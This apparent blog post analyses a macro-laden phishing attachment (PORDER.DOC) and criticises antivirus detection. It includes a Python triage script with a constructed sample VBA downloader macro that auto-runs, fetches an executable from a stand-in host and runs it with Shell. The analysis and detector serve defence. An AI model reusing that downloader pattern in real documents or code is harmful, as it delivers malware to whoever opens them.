Monday 2 November 2015

Malware examination

Hi
Please confirm receipt of order
Kind regards
Margaret


-----------------------------
This email and any attachments are believed to be virus free, however
recipients are responsible for appropriate virus checks. The email and
attachments are confidential to the addressee and unauthorised use, copying or
retention by others is prohibited.

-----------------------------


Enclosed was PORDER.DOC. I uploaded it to Virustotal, three out of 55 products flagged it as malware. But now I have some tools for examining such things - time to deploy!

By the way, "This email and any attachments are believed to be virus free" is a nice touch. I really can't imagine why anyone puts that into an email. "I'm a good guy" isn't convincing to me, and it shouldn't be to anyone else.

I'm using gsf-vba-dump. To get a copy, if you're running Linux, do "yum install libgsf-devel". What it does is peer inside Word documents (and suchlike) and display any macros. And that's what it did - 1000 lines of macro code!

Back in 1995, when the first Word macro virus (winword.concept) appeared, there was nothing like this available. We wanted to be able to scan inside a DOC file, so we asked Microsoft for the file format. After a few months of effort trying to get the file format, we eventually accepted that not even Microsoft knew how it worked. They had no specification for the file format of their own product! We had to wing it, and wing it we did. I think we determined the file format before MS did.

Now they have got a specification for the file format, and that's how gsf-vba-dump was written.

So I was able to read the macros in the file. Unfortunately, they're written in Visual Basic, not a language I'm familiar with (I wrote a program in it once, and that convinced me).
I can see where the macros use http to request something from a remote server, and I'm guessing that what it downloads is the malware that does the business.

I can also see that the macro is obfuscated - there's stuff that it's trying to conceal.
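As an added illustration (my own script, not anything from the post or from gsf-vba-dump), here is a small Python triage pass over dumped macro source of the kind gsf-vba-dump prints: it flags auto-run entry points, HTTP download primitives, process execution and Chr()-style obfuscation, and undoes the Chr() concatenation so that hidden strings such as the request target become readable. The sample macro is constructed; pass the path of a real dump as the first argument to run it on that instead.

```python
import re
import sys

# Constructed sample standing in for the output of "gsf-vba-dump PORDER.DOC";
# it is NOT the real macro from the document discussed in the post.
SAMPLE_VBA = r"""
Sub AutoOpen()
    Dim o As Object
    Set o = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & "2.XMLHTTP")
    o.Open "GET", "http://example.invalid/x.exe", False
    Shell Environ("TEMP") & "\a.exe", vbHide
End Sub
"""

AUTOEXEC = re.compile(r"\bSub\s+(AutoOpen|AutoExec|Document_Open|Workbook_Open)\b", re.I)
HTTP = re.compile(r"XMLHTTP|URLDownloadToFile|WinHttpRequest|https?://", re.I)
EXEC = re.compile(r"\bShell\b|WScript\.Shell|CreateObject", re.I)
OBFUSC = re.compile(r"\bChr[BW]?\s*\(|StrReverse|\bXor\b", re.I)
CHR_CALL = re.compile(r"Chr[BW]?\s*\(\s*(\d+)\s*\)", re.I)

def decode_chr_strings(vba: str) -> str:
    """Replace Chr(n) calls with literal characters, then fold adjacent
    literals joined by '&' so obfuscated strings read as one literal."""
    text = CHR_CALL.sub(lambda m: '"' + chr(int(m.group(1))) + '"', vba)
    while True:  # "a" & "b" -> "ab", repeated until nothing changes
        folded = re.sub(r'"([^"]*)"\s*&\s*"([^"]*)"', r'"\1\2"', text)
        if folded == text:
            return text
        text = folded

def triage(vba: str) -> dict:
    """Report which suspicious traits the macro source shows, plus any URLs
    recovered after undoing simple Chr()-based obfuscation."""
    decoded = decode_chr_strings(vba)
    return {
        "autoexec": bool(AUTOEXEC.search(decoded)),
        "http-request": bool(HTTP.search(decoded)),
        "execution": bool(EXEC.search(decoded)),
        # obfuscation is judged on the raw text, before Chr() calls are undone
        "obfuscation": bool(OBFUSC.search(vba)),
        "urls": re.findall(r"https?://[^\s\"']+", decoded),
    }

if __name__ == "__main__":
    src = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_VBA
    for key, value in triage(src).items():
        print(f"{key:13}{value}")
```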

52 out of 55 products pass it as clean. Do NOT base your anti-malware strategy on these products.

3 comments:

  1. This very one was aimed at me too.
    Gmail refused to import it.
  2. Good for gmail!

    But many people don't use gmail, and might be relying on their antivirus.
  3. Bad strategy, as your tests show.